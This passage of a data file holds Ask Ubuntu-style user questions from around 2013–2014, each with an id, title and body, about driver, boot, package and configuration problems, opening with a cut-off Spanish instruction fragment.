terminal : sudo apt-get install xfs xfstt al finalizar en el gestor de paquetes synaptic instale los siguientes paquetes : *-t1-xfree86-nonfree - non-free postscript type 1 fonts from xfree86 *-ttf-xfree86-nonfree - non-free truetype fonts from xfree86 *-ttf-xfree86-nonfree-syriac - non-free syriac opentype fonts from xfree86 *-xfonts-75dpi - 75 dpi fonts for x *-xfonts-100dpi - 100 dpi fonts for x reinicie su equipo y ejecute : source /usr/share/root/bin/thisroot.sh y escriba root deberia de funcionar ( de no ser así podrian faltar paquetes del paso_0 instalelos todos y reinicie la instalación ) .
406192	ca n't get nvidia proprietary drivers working	i 've looked around , but have n't found a solution that works for me to get the nvidia proprietary drivers working . i 'm running ubuntu 13.10 and have a gtx 680 graphics card . i 've tried the following : sudo apt-get install nvidia-current result : when i reboot the machine i just get a black screen . if i ctrl+alt+f-whatever to a different tty panel i just get a blinking cursor and ca n't type or do anything . i reinstalled ubuntu and then tried this : sudo apt-get update sudo apt-get upgrade sudo apt-get install linux-source sudo apt-get install linux-headers-generic sudo apt-get install nvidia-current same result as above . finally i just tried installing it from the restricted drivers tab , but it just tells me there are no drivers available after searching for a few seconds .
406195	package ubuntuone-control-panel-qt is n't available	just installed ubuntu 12.04lts 64bit and i 'm setting up ubuntu one , but it wouldnât let me . package ubuntuone-control-panel-qt is n't available there is n't even any more available information . that is all it gives me . i 'm sorry for my lack of knowledge but i cant seem to find anything else .
406197	how to compile latest vlc on ubuntu 12.04 from git sources	i want to install the latest vlc source from git and compile it on ubuntu 12.04 and make it very full-featured . a plugin i wish to use requires that i have vlc sources available , so i might as well build vlc from source . for this question , you can assume that i will not install vlc from the repos or a ppa . i want to do what is generically described at this page : unixcompile - videolan wiki unfortunately , i 've been trying for 3 days . i have a ton of questions and i have hit a few different errors . i came here hoping to find a nice ubuntu-focused how-to guide . all i found was how to install from a ppa . furthermore , i want to enable near-maximum functionality of vlc . and i have the real ffmpeg installed on my system ( from a ppa ) , so i 'm guessing that probably impacts vlc 's configuration . here are some examples of other configure options i want vlc to have : the sftp option ( configure option -- enable-sftp ) , bluray playing , kde and/or qt support . those are a minimum . i appreciate other recommendations . i 'd rather have too much than too little for this `` experiment . '' here 's the minimal configure i came up with so far : ./configure -- enable-x11 -- enable-xvideo -- enable-sdl -- enable-avcodec -- enable-avformat -- enable-swscale -- enable-mad -- enable-libdvbpsi -- enable-a52 -- enable-libmpeg2 -- enable-dvdnav -- enable-faad -- enable-vorbis -- enable-ogg -- enable-theora -- enable-faac -- enable-mkv -- enable-freetype -- enable-fribidi -- enable-speex -- enable-flac -- enable-live555 -- with-live555-tree=/usr/lib/live -- enable-ffmpeg -- with-ffmpeg-mp3lame -- enable-kde -- enable-sftp -- enable-real -- enable-media-library -- enable-caca -- enable-skins -- enable-skins2 -- enable-alsa -- enable-qt4 -- enable-ncurses after building with those options i get an error that libvlccore.so.7 is n't found after make install . but i have concerns that many of my prior steps have been less than ideal for ubuntu . hopefully someone can tell me what configure options to use based on experience . all i can do is guess . which libraries do i need to install to have maximum features in vlc ? here 's the suggestion from the vlc wiki , but it is for ubuntu 11.10 $ sudo apt-get -y install libvorbis-dev libogg-dev libtheora-dev speex libspeex-dev flac libflac-dev \ x264 libx264-dev a52-0.7.4 liba52-0.7.4-dev mpeg2dec libmpeg2-4-dev faad libfaad-dev faac libfaac-dev \ lame libmp3lame-dev ffmpeg libavdevice-dev libmad0 libmad0-dev dirac libdirac-dev liboil-dev libschroedinger-dev \ libebml-dev libdca-dev twolame libtwolame-dev libmpcdec-dev libvorbisidec1 libvorbisidec-dev libass-dev libass4 \ libmatroska-dev libdvbpsi-dev libmodplug1 libmodplug-dev libshout3 libshout3-dev libdvdread4 libdvdnav4 \ libdvdnav-dev livemedia-utils liblivemedia-dev libcddb2 libcddb2-dev libcdio10 libcdio-dev libxcb-composite0-dev\ libcdio-utils vcdimager libvcdinfo0 libvcdinfo-dev libgpg-error0 libgpg-error-dev libgcrypt11 libgcrypt11-dev \ gnutls-bin libgnutls26 libgnutls-dev libdap10 libdap-bin libdap-dev libxml2 libxml2-dev libpng12-0 libpng12-dev \ libjpeg8 libtiff4 libsdl1.2-dev libsdl-image1.2 libsdl-image1.2-dev libc-bin gettext libfreetype6 libfreetype6-dev \ libfribidi-dev libfribidi0 zlib1g zlib1g-dev libtag1-dev libcaca0 libcaca-dev caca-utils libqt4-core libqt4-dev \ libportaudio2 libportaudio-dev libupnp-dev libupnp4 libupnp3 libexpat1 libexpat1-dev yasm libxcb-xv0 libxcb-xv0-dev \ libx11-xcb1 libx11-xcb-dev here is the configure command from the vlc wiki ( which i modified above to add more features ) . ./configure -- enable-x11 -- enable-xvideo -- disable-gtk \ -- enable-sdl -- enable-ffmpeg -- with-ffmpeg-mp3lame \ -- enable-mad -- enable-libdvbpsi -- enable-a52 -- enable-dca \ -- enable-libmpeg2 -- enable-dvdnav -- enable-faad \ -- enable-vorbis -- enable-ogg -- enable-theora -- enable-faac\ -- enable-mkv -- enable-freetype -- enable-fribidi \ -- enable-speex -- enable-flac -- enable-livedotcom \ -- with-livedotcom-tree=/usr/lib/live -- enable-caca \ -- enable-skins -- enable-skins2 -- enable-alsa -- disable-kde\ -- disable-qt -- enable-wxwindows -- enable-ncurses \ -- enable-asa -- enable-release
406198	can not start ubuntu	i just finish installing ubuntu on my windows 7 computer . when i restart my computer , it does not give me the option to boot up ubuntu , it automatically start windows7 . what should i do to start ubuntu
406200	ca n't boot os from usb on samsung series 7	i downloaded the iso and burned it via unetbootin . i go into bios and change the following settings : disable fast boot , and make the os selection cms make usb boot first then when i boot , it just boots back to windows8 . i have a `` samsung series 7 chronos '' with nividia graphics . -- any help would be appreciated .
406204	how can i add the current cpu usage to my menu bar as a percentage ?	i 'm used to os x and i use menumeters in my menu bar to monitor cpu usage as a percentage and memory as used/free totals . i really want to add this functionality in ubuntu as i 'm using it for development . i 've seen that you can add graphs . graphs mean nothing to me : ) . i need percentages . how can i add this functionality in ubuntu ?
406205	java process stops suddenly	this is something i could n't find a solution at all and quite weird . i have java process that is started by openbox . this has been working for about an year and now after some unspecified time java process suddenly stops with no errors . i do n't see any jvm crash report nor any outofmemoryerror in logs even if i enabled +heapdumponoutofmemoryerror on jvm . i also have monitored java process through jconsole and found no memory issues . so i believe that this is something to do with ubuntu process fiddling java process . when i invoke java with strace futex ( 0xb6964ba8 , futex_wait , 2542 , null < unfinished ... exit status 143 > is the message i got . i found following questions relevant first quest second quest my device is running ubuntu 12.04.2 lts . java version 1.6.0_26 sun hotspot server vm . i found no errors or messages in syslog and kernel.log . one more thing is i recently installed sar utility and is configured to run every 10 minutes . i am suspecting whether this has an impact on that . please help .
406206	uses vim as an ide	i want plugins for vim so that i can use it as a c language ide . i used to use qtcreator and i really appreciate his auto-completion ( really perfect ) , but after trying for several months vim i really begins to fail in love with his working method . so if anyone have used qtcreator and vim , it will be nice if he advise me which plugins or options that helps me use vim as an ide . ps : i know there is the fakevim in qtcreator mode ( which allows you to move around like vim ) but the problem is when i activate this feature instant auto-completion in qtcreator disappears ( and even display prototype , because what i really like in qtcreator is that you dice step function it shows you in her gray prototype so that you may know which parameter use with the function ) . thank you in advance .
406207	grub will show only on manual boot but not on reboot ( dual boot windows 8.1 ubuntu 13.10 )	here 's my problem : i have a dual boot installation of ubuntu 13.10 and windows 8.1 on my laptop and i get the grub menu only when i shutdown and boot again manually . if i try to simply reboot from linux or from windows , my computer directly loads on windows . is n't that strange ? does anyone know how to fix it ?
406210	issues with chrome : crashing , `` aw snap '' , and flash player crashing	i 'm currently using google chrome for ubuntu 12.04.4 . my graphics card is an nvidia geforce gt 630 . i currently use the nouveau drivers , since the proprietary drivers seemed buggy . frequently , and especially while loading flash-based content ( but not always ) , chrome either crashes ( closes completely ) , freezes ( i can use it , but the tab i currently have open does n't intereact ) , i get the `` aw snap '' page , or flash crashes . i currently use chrome 's built-in pepperflash , but adobe 's flash gives me the same issue . here are some terminal logs for crashes : recieving an `` aw snap '' page when playing a flash game : [ warning : flash/platform/pepper/pep_module.cpp ( 63 ) ] sandboxed [ 2776:2806:0115/222154 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2776:2798:0115/222155 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2776:2798:0115/222159 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2776:2798:0115/222232 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2776:2798:0115/222304 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2776:2798:0115/222306 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) [ 2776:2798:0115/222338 : error : audio_manager_base.cc ( 422 ) ] not implemented reached in virtual std : :string media : :audiomanagerbase : :getdefaultoutputdeviceid ( ) -- 2014-01-15 22:25:15 -- https : //clients2.google.com/cr/report resolving clients2.google.com ( clients2.google.com ) ... 2607 : f8b0:4009:805 : :1002 , 173.194.46.35 , 173.194.46.36 , ... connecting to clients2.google.com ( clients2.google.com ) |2607 : f8b0:4009:805 : :1002|:443 ... connected . -- 2014-01-15 22:25:15 -- https : //clients2.google.com/cr/report resolving clients2.google.com ( clients2.google.com ) ... 2607 : f8b0:4009:800 : :1004 , 173.194.46.105 , 173.194.46.98 , ... connecting to clients2.google.com ( clients2.google.com ) |2607 : f8b0:4009:800 : :1004|:443 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `/dev/fd/3' [ < = > ] 16 -- .-k/s in 0s crash dump id : 2014-01-15 22:25:15 ( 2.64 mb/s ) - `/dev/fd/3 ' saved [ 16 ] 522ddaaef09bbd7e http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `/dev/fd/3' [ < = > ] 16 -- .-k/s in 0s crash dump id : 2014-01-15 22:25:16 ( 2.77 mb/s ) - `/dev/fd/3 ' saved [ 16 ] 6012058ed199d1f8 i 'll try to update this later with more reports . thanks for any help .
406211	wireless on hp mini 110-3500 not working	i install ubuntu 12.04 on hp mini 110-3500 , but the wireless not working . there are n't any internet connection , except the wireless . what should i do to fix this problem ? thank you
406217	will i lost my data or not ?	i have ubuntu 12.04 in my system.i stored data in /home directory ( i have given one partition of hard disk to this /home folder ) . and my home directory /home/user . now my question is that if i format my system ( partition in which os is stored ) then will i lost my data stored in /home directory ? i know i will lost my data of /home/user directory .
406219	can not download any software	this is the worst experience i am writing i had with ubuntu . i have a virtual machine running ubuntu 12.10 and connected to internet via nat , internet is used via domain . now to connect to internet i need to login for which it has firefox but not java which is required and i can not install the required software to login . it does not have java officially there is no java.deb only rpm alien.deb is shown as bad package as i try to copy and install offline , same with other packages . i can not download any dependency to satisfy and there are lot of packages which do not provide their dependencies . most of the times it is assumed that we are connected to internet on that system and it can apt get everything . please help , i have downloaded the .gz file for jre and followed through instructions to link it with firefox plugin but still it does not run the jre . other than this is there a way i can route my vm traffic through windows which is already connected
406224	how to get grub menu appear after the dual boot menu	i have ubuntu alongside windows 7 on my computer . recently i reinstalled ubuntu ( 12.04 ) and now the grub menu appears before the dual boot menu . how can i change the order ?
406225	ca n't set resolution matrox video card	i built my first server and displayed 1920x1080 properly through the built in video vga , on mobo . after confirming that worked i installed matrox m9120 pci x16 and was lowered to 1024x768 resolution . i downloaded the proper .run file and followed some instructions i found on google to unpack the drivers and run them ./ [ name ] .run . terminal showed the drivers installed . as a long time windows user my train of thought was the proper resolution would be enabled . not as such ! any tips on what i am doing incorrectly ? also when i installed 8gb of ram , it shows 7.9gb installed . with 16gb it showed 15.7 installed . i had assumed that the system allocated some ram to video when i was using vga . when i turned mobo video off in bios it continued to display 15.7gb free . is this video related or simply linux 's way of showing ram count ?
406228	ubuntu 12.04 ca n't discover my wireless	i 'm using a dual boot eeepc 1015px with windows 7 & ubuntu 12.04 . i had been using 13.04 then 13.10 on this netbook & the wireless worked perfectly . i have since replaced 13.xx with a fresh install of 12.04 ( because i could n't get other things working on 13.xx ) and it now can not see my wifi . i used a liveusb , and it picked up my wifi , but once i installed the full o.s. , it no longer picks it any wifis . according to this website ( http : //www.notebookcheck.net/review-asus-eee-pc-1015px-netbook.70557.0.html ) , the 1015px has the atheros ar9285 wireless network adapter . any ideas what 's going on here ? thanks , nick mckinnon
406229	there was no /etc/default/grub file	i 'm running ubuntu 13.10.i 'm trying to change the grub timeout by editing the /etc/default/grub file.but there was no such file in my pc . on startup actual grub menu was displayed and i 'm not experiencing any boot problems.if this file was so important for booting means why i do n't experiencing any boot problems ?
406230	unable to boot to gui from a text window	i have installed nvidia cuda drivers and toolkit in ubuntu 12.04 as given in the book cuda programming a developerâs guide to parallel computing with gpus by shane cook . i have used these commands sudo chmod +w /etc/default/grub sudo nano /etc/default/grub change the following lines : grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux_default= '' '' to # grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux_default= '' text '' now update grub using sudo update-grub then type sudo sh cuda_5.5.22_linux.32.run ( i have downloaded cuda_5.5.22_linux_32.run from nvidia.com ) drivers and toolkit have been installed successfully now i have changed etc/defualt/grub to its previous state i.e . grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux_default= '' '' and update it and then sudo service lightdm restart but now i am unable to go back to gui mode i am getting only a blank screen please let me know where i am getting wrong and how to resolve it .
406232	like or comment notification in pidgin	i am new in ubuntu and i am using ubuntu 13 and pidgin . i am using facebook login in pidgin . i want to get the like or comment notification also through pidgin . can i get like or comment notification through pidgin ?
406234	kubuntu studio . compositing settings and firefox , networkmanager popup issue	i 'm moving over to an ubuntu variant after some time with linux mint . i 'm using ubuntu studio 13.10 with the kde desktop . i like kde and i am a musician , so the low latency kernel and preinstalled recording tools of ubuntu studio are fantastic . i 'm having a few issues . my networkmanager popup shows before kde is fully loaded and thus looks kinda ugly . my googling skills ( or lack thereof ) did n't show up anything . i have a few scripts running via dispatcher.d to automount google drive etc . i 'm wondering if i should perhaps run something from there ? i copied over my .kde folder from a linuxmint 15 kde install , along with a few other things from my home folder to get my theming , widgets , bookmarks etc . i use an opensuse ppa for the latest install of owncloud . i seem to face issues with each of the compositing settings , i either get choppy scrolling in firefox or deformed pictures and the occasional letter as i scroll . i 've tried adjusting about : config to make better use of ram and that helped a little . i have also run a few tweaks for my ssd . i have 8gb of ram and a core2duo processor ( toshiba satellite p505 . ) finally , i have to manually run killall jackd to get audio back after using jack . is there a way that i can tell ardour to turn off jack on close ? i 'll keep researching and post any fixes as i find them , any assistance would be greatly appreciated .
406236	why has 12.04 removed editing groups	i am trying to use virtualbox but i need to add the user to virtualbox so the virtual machine will have access to the usb ports but ubuntu has removed many of the admin controls . simplify is good but do n't overdo it . i tried the adduser on the terminal and the control of which groups the new user will be in has been removed . debian has always keep security tight and made admins use the terminal but now you are taking the control away from admins . is this not heading in the opposite direction than what yo say your doing giving choice to the user ?
406237	dash shows a extra chrome icon related to amazon	in dash the chrome icon shows up twice under applications , one that says `` google chrome '' and a non-functional one that reads amazon.com : j ... .-google chrome . i have tried purging the chrome app yet the amazon related icon remains . how do i get rid of it ?
406238	how to uninstall failed 'dpkg -i xorg_7.6+12ubuntu1_amd64.deb ' command	i was attempting to fix a dual monitor issue with an install of ubuntu 12.04 64 bit on a sony vaio vgn-ns135e . i ran the following command ( downloaded the deb from - https : //launchpad.net/ubuntu/+source/xorg/1:7.6+12ubuntu1/+build/3309759 ) : sudo dpkg -i xorg_7.6+12ubuntu1_amd64.deb because i was frustrated and was told in a few posts that reverting xorg might help . i somehow ended up fixing the monitor issue i was having but now i get the issue of this failed install . ( monitor is now working btw , once i rebooted with the monitor plugged in before boot . ) my error now is that i have a partially configured xorg package and seemingly no way to remove it . i also can not open the software center without it wanting to repair and the repair fails for the same reason as the next code block . here is output from sudo apt-get autoremove : sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : xorg : depends : xserver-xorg ( > = 1:7.6+12ubuntu1 ) e : unmet dependencies . try using -f. i 've attempted all of the commands on the post : how do i force configuration of partially installed packages ? here is the output from sudo apt-get install -f : sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : xorg suggested packages : xorg-docs xfonts-100dpi xfonts-75dpi the following packages will be upgraded : xorg 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 2,718 b of archives . after this operation , 1,024 b of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main xorg amd64 1:7.6+12ubuntu2 [ 2,718 b ] fetched 2,718 b in 0s ( 9,195 b/s ) dpkg : dependency problems prevent configuration of xorg : xorg depends on xserver-xorg ( > = 1:7.6+12ubuntu1 ) ; however : package xserver-xorg is not installed . dpkg : error processing xorg ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : xorg update : here is the output from sudo dpkg -- configure xorg : dpkg : dependency problems prevent configuration of xorg : xorg depends on xserver-xorg ( > = 1:7.6+12ubuntu1 ) ; however : package xserver-xorg is not installed . dpkg : error processing xorg ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : xorg update 2 running sudo apt-get install aptitude results in this : sudo apt-get install aptitude reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : aptitude : depends : libboost-iostreams1.46.1 ( > = 1.46.1-1 ) but it is not going to be installed depends : libcwidget3 but it is not going to be installed depends : libept1.4.12 but it is not going to be installed recommends : libparse-debianchangelog-perl but it is not going to be installed xorg : depends : xserver-xorg ( > = 1:7.6+12ubuntu1 ) e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . update 3 ran the following command ( sudo dpkg -r xorg ) : sudo dpkg -r xorg dpkg : dependency problems prevent removal of xorg : ubuntu-desktop depends on xorg . dpkg : error processing xorg ( -- remove ) : dependency problems - not removing errors were encountered while processing : xorg and have been unsuccessful thus far . i hope this is enough info , thank you for any help !
406241	nfs timeout for osx client	i finally managed to get a nfs share on my ubuntu 13.10 home server mounted on my osx laptop ( 10.9.1 mavericks ) , after all the hassle of resolving user ids , insecure settings and the like . now i get the volume mounted ( via the command line for the time being ) and accessible rw , but ... it disappears after 30 secs/1 minute ... osx tells me it is not available anymore ... ? ? ? as soon as i run the mount command agains it comes back but ... same story . i do n't see any error message via dmesg , where shall i look for clues ? many thanks p.s . : i already tried giving mount some more options , like retrans and soft and proto=tcp
406242	xfce4 sound ca n't be un-muted	i have no sound on xfce4 . when i mute sound on xfce ( or login to xfce with the sound muted from the last shutdown ) , un-muting the sound does n't actually un-mute all the sound outputs . it only un-mutes the master level , but not the speaker nor the headphone levels . in the attached picture , when i mute\un-mute the sound , only the master level is responding . my laptop is a dell inspiron se 7520
406249	kubuntu boots to black screen and no cursor after installing updates 1/15/14	on january 6 i installed a daily build of kubuntu 14.04 . ran great until 1/14/14 after installing updates i booted to a black screen no cursor . i shut down the computer and restarted to a boot menu and booted into recovery mode and chose the latest kernel and ran whatever fixes i was allowed to run . that got me booting normally to the desktop but as soon as i rebooted again i got a black screen no cursor . so i started fresh today 1/15/14 and immediately ran all updates through the muon package manager and after the updates had completely installed once again booted to a black screen no cursor . so i again booted into recovery mode and was able to boot to desktop . after immediately rebooting i once again got a black screen no cursor . so it must be an update that is preventing booting normally . if anyone is able to assist i would be very appreciative . thank you .
406250	is it safe to place symlinks in /bin directory ?	i have many command line tools that i use frequently . i was using the normal method to traverse till the complete path of that command through terminal and then did ./command-name but this is a cumbersome and time-consuming task . researching the topic of `` how to execute a command from anywhere through terminal '' , i ended up in solution to include the path in the environment variable ( by editing ./bashrc ) . this works fine . i even found out that all the commands that work globally ( like mkdir , ifconfig , cp , etc ) are placed in `` /bin '' directory . on including the `` symlinks '' of my commands in `` /bin '' directory , all is working fine and i can execute the commands from anywhere in terminal . my question is it safe to place symlinks in /bin directory directly . i am asking this because while placing the symlinks , it asked me for administrator password . will it create any difference if i place commands ' symlinks in /bin as compared to /usr/bin directory ? environment ( if it matters ) : ubuntu 13.10 , 32-bit .
406252	ubuntu server 12.04.3 zoneminder	i have ubuntu server 12.04.3 and zoneminder 1.25.00 on 32gb ssd drive . all works well till i need to add new hdd for data . after i install 1,5tb hdd ( in fstab last line `` /dev/sdb /data ext3 defaults 0 0 '' ) . i can add and rm files on /data , works good . firstly i did like in this site but it did not work . i can see cameras but can not record . i try to change `` options/path '' on web interface of zoneminder and add following pathes /data/events /data/images /data/sounds . did not work . why ?
406253	nautilus search options show only the file type filter	i 've ubuntu 13.04 32 bit with the `` stock '' nautilus file browser . i want to perform a search in a directory with subdirectories for all the files modified in a period of time . with nautilus , when i click on the search button and then on the `` + '' to add a search filter , the menu bar with the 2 dropdown menu shows up but : in the leftmost dropdown menu i should be able to chose the type of filter , but when i click on the dropdown menu nothing happens , it remains selected the file type filter and i ca n't chose others kind of filters . it seems the my nautilus `` knows '' only the file type filter ... what i could try to solve the problem ?
406258	subwoofer not working on my laptop	i installed ubuntu 12.04 on my toshiba qosmio f55 q502 laptop , but ubuntu does not recognize the subwoofer . this laptop has a 2.1 speaker system . can you help me get it to work ? i tried these instruction to activate the subwoofer from the terminal and edited some files , but that did n't work out because the instructions were for an asus laptop . can someone give me some instructions how to enable the subwoofer on my laptop ? aleksandar @ qosmio : ~ $ lspci 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:01.0 pci bridge : intel corporation mobile 4 series chipset pci express graphics port ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 3 ( rev 03 ) 00:1c.5 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 01:00.0 vga compatible controller : nvidia corporation g94 [ geforce 9700m gts ] ( rev a1 ) 08:00.0 network controller : atheros communications inc. ar928x wireless network adapter ( pci-express ) ( rev 01 ) 0e:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 02 ) 20:00.0 firewire ( ieee 1394 ) : jmicron technology corp. ieee 1394 host controller 20:00.1 system peripheral : jmicron technology corp. sd/mmc host controller 20:00.2 sd host controller : jmicron technology corp. standard sd host controller 20:00.3 system peripheral : jmicron technology corp. ms host controller 20:00.4 system peripheral : jmicron technology corp. xd host controller aleksandar @ qosmio : ~ $ lsusb bus 001 device 003 : id 04f2 : b008 chicony electronics co. , ltd usb 2.0 camera bus 002 device 002 : id 0bda:8178 realtek semiconductor corp . bus 003 device 002 : id 1546:01a5 u-blox ag bus 006 device 004 : id 04f3:0234 elan microelectronics corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub subwoofer is built in laptop . you can see from picture , right above of the hdd cover .
406259	no video flash player back	the flash videos is not working . i tried to disable hardware acceleration but this did not work here is a picture . hardware driver is unknown . guess i ca n't post a pic wow . they say a picture is worth a thousand words i guess not on this post .
406263	can not open applications like skype	i installed ubuntu 13.10 and i am unable open some applications like skype unless i am a root . not sudo skype , but sudo su - > skype . i did n't care about it really ( though it was annoying ) but now i start android development and i am unable to create autogenerated r file . i guess it is because ia32-lib is with root permissions too . what did i do wrong ? how can i fix it ? i am running 64-bit ubuntu 13.10 .
406264	unable to use windows after installing ubuntu 12.04	i have recently installed ubuntu 12.04 in my system . before that , i had windows 8 . i did the alongside installation . after that , i can see the drives ( & even the drive of windows ) from within the ubuntu . but i am unable to get the option of windows and ubuntu at the boot menu . i have tried my best to solve it . i have installed grub . i have gone through askubuntu , but i still unable to solve it . can anyone help me ? my laptop model is- acer aspire v5- 5 series .
406265	ssh server does not start on lubuntu live image	i installed the lubuntu 13.10 32bit iso image with usb-creator-gtk on a usb stick and assigned 2gb of persistent storage to it . that 's for a thin client , which does not have any storage of itself at my office and we do n't have a way to do net pxe boots . after i booted the thin client from this usb stick , i installed openssh-server , but it just wo n't start : $ sudo start ssh start : unknown job : ssh hm , well , why ? dmesg does n't show anything and neither does /var/log/syslog . i can manually start sshd just fine , after i first created the /var/run/sshd directory : $ sudo -i # mkdir /var/run/sshd # /usr/sbin/sshd # ps awux | grep sshd ... - > shown # pkill sshd # start ssh start : unknown job : ssh /etc/init/sshd exists and has sensible content ( compared it to my normal workstation ) . any ideas ? reinstalling ( â sudo apt-get purge openssh-server ; sudo apt-get install openssh-server ) did not help : (
406268	a shell file containing count but not showing when i try to run from crontab	i am new in writing shell script i write a script like this # ! /bin/bash pid= $ ( ps -ef | grep `` sh gps.sh '' | grep -v grep | awk ' { print $ 2 } ' ) if [ -z $ pid ] then cd /opt/etrans/cronjobs cnt= $ ( echo `` select 'count '||count ( * ) from schema.table where c_is_processed ='n ' '' | psql | grep count |awk ' { print $ 2 } ' ) echo `` out side of if count is $ cnt '' | cat > > /opt/cronlog/unprocess_data_process.log # for log writing if [ $ cnt -ge 5000 ] then echo `` inside manual gps '' | cat > > /opt/cronlog/unprocess_data_process.log # for log writing sh manual_gps.sh else echo `` inside gps '' | cat > > /opt/cronlog/unprocess_data_process.log # for log writing sh gps.sh fi else echo `` gps process is running with pid= $ pid '' fi exit when i run the .sh file manually it runs file and i can see all the counts in my log file but when i run it from crontab it is not printing the counts .
406269	galaxy nexus can not boot after ubuntu touch installation	i 've installed ubuntu touch on my galaxy nexus following the official tutorial : '' manual download & installation '' . and the image files version was `` 15-jan-2014 18:27 '' .after the installation the last file `` trusty-preinstalled-touch-armhf.zip '' , it rebooted automatically , then got stuck in a black screen with a picture of `` google '' in the middle . then i executed : root @ cdma-desktop : ~/downloads # adb shell busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . # system-image-cli -- info /system/bin/sh : system-image-cli : not found # # # ls dev bin usr sbin scripts etc proc var system root lib run init conf sys tmp tmpmnt # exit root @ cdma-desktop : ~/downloads # adb devices list of devices attached 0123456789abcdef device what am i supposed to do ?
406270	installation of ubuntu 12.04 in sony svf14	i ca n't even boot the cd of ubuntu 12.04 in sony vaio svf14 series of laptop.eventhough it worked in changing bios set up from uefi to legacy i could n't able to access the other windows drives from ubuntu.so please help me install it in uefi along side win8 .
406271	how to set up a ubuntu with php 5.3	hi i have the problem that i have multiple projekts who are not compatible to php 5.4 yet . now i have to move some of these projects to a new server and our admin told me that its not possible to install an ubuntu server with php 5.3 . that is something i ca n't belive . he said the problem are the dependencies . is this true ? and how much time is it to set up a server with this configuration ?
